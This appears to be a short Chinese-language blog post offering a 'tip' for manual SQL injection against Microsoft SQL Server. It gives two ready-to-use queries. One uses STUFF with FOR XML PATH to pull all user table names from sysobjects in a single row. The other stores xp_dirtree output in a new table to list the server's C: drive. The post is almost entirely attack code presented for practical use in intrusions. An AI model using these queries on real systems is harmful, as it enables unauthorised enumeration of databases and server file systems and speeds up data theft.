SQL注入小技巧
平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句,有兴趣的朋友可以试试,类似MYSQL的group_concat !效果还是不错的!
测试1:
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
测试2:
create table dirs(paths varchar(100),paths1 varchar(100), id int)
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1

浙公网安备 33010602011771号